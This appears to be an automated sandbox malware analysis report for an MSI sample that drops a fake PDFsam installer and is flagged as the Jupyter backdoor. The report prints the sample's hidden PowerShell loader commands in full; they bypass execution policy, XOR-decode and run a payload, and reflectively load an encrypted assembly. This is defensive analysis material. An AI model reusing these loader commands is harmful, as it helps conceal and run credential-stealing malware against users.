                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe TID: 5032Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep time: -39009s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep time: -36392s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep time: -33994s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -37296s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -32098s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -32299s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -31103s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -32270s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -35734s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -39621s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -39522s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -35289s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -32479s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -34481s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -35610s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -31029s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -33125s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -37808s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -38576s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -34740s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -30572s >= -30000s
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI26BB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEE6.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1A75.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1265.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5DE.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI294D.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI60E.tmpJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5636
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2034
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 3174
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 684
                        Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeCode function: 6_2_017DB235 VirtualQuery,GetSystemInfo,6_2_017DB235
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 39009
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 36392
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 33994
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 37296
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 32098
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 32299
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 31103
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 32270
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 35734
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 39621
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 39522
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 35289
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 32479
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 34481
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 35610
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 31029
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 33125
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 37808
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 38576
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 34740
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 30572
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: powershell.exe, 00000015.00000002.987440827.00000273C9995000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeCode function: 6_2_01894B3C mov eax, dword ptr fs:[00000030h]6_2_01894B3C
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeCode function: 6_2_017EBD95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_017EBD95
                        Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exeCode function: 12_2_00BDBD95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00BDBD95

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        Yara detected Powershell dedcode and executeShow sources
                        Source: Yara matchFile source: Nyship-Empire-Plan-Gym-Membership.msi, type: SAMPLE
                        Source: Yara matchFile source: C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Installer\MSI113A.tmp, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Installer\5206a8.msi, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Installer\5206aa.msi, type: DROPPED
                        Bypasses PowerShell execution policyShow sources
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe' Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'Jump to behavior
                        Source: PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpBinary or memory string: Rrety#restartRun button clicked#more-detailsminimize#error-details#try-againD:\TemporaryBuilds\installer_builder_1\66\s\GlamInstallerCom\BalloonView.cppRestart button clicked% completeerrorview-stateDownloading OCR Edit module:Downloading OCR Search module:Downloading Main module:Downloading Edit and related modules:Installing update Edit and related modules:Installing Edit and related modules:Installing update Main module:Installing Main module:Installing update OCR Search module:Installing OCR Search module:Installing update OCR Edit module:Installing OCR Edit module:InstalledEdit - Edit and related modules are installed.InstalledMain - Main module is installed.InstalledTesseractOCR - OCR Search module is installed.InstalledOCR - OCR Edit is installed.restartappoverlay.popupShell_TrayWnd#progress-text,"
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmpBinary or memory string: Program Manager
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmpBinary or memory string: rety#restartRun button clicked#more-detailsminimize#error-details#try-againD:\TemporaryBuilds\installer_builder_1\66\s\GlamInstallerCom\BalloonView.cppRestart button clicked% completeerrorview-stateDownloading OCR Edit module:Downloading OCR Search module:Downloading Main module:Downloading Edit and related modules:Installing update Edit and related modules:Installing Edit and related modules:Installing update Main module:Installing Main module:Installing update OCR Search module:Installing OCR Search module:Installing update OCR Edit module:Installing OCR Edit module:InstalledEdit - Edit and related modules are installed.InstalledMain - Main module is installed.InstalledTesseractOCR - OCR Search module is installed.InstalledOCR - OCR Edit is installed.restartappoverlay.popupShell_TrayWnd#progress-text,"
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmpBinary or memory string: Progman
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeCode function: 6_2_017ED868 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_017ED868
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeCode function: 6_2_018993B0 _free,GetTimeZoneInformation,_free,6_2_018993B0
                        Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 BlobJump to behavior

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected Jupyter backdoorShow sources
                        Source: Yara matchFile source: 21.2.powershell.exe.273b1806fc8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.273b1806fc8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.273c9b50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.273c9b50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected Jupyter backdoorShow sources
                        Source: Yara matchFile source: 21.2.powershell.exe.273b1806fc8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.273b1806fc8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.273c9b50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.273c9b50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Replication Through Removable Media1Command and Scripting Interpreter1Startup Items1Startup Items1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery2Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
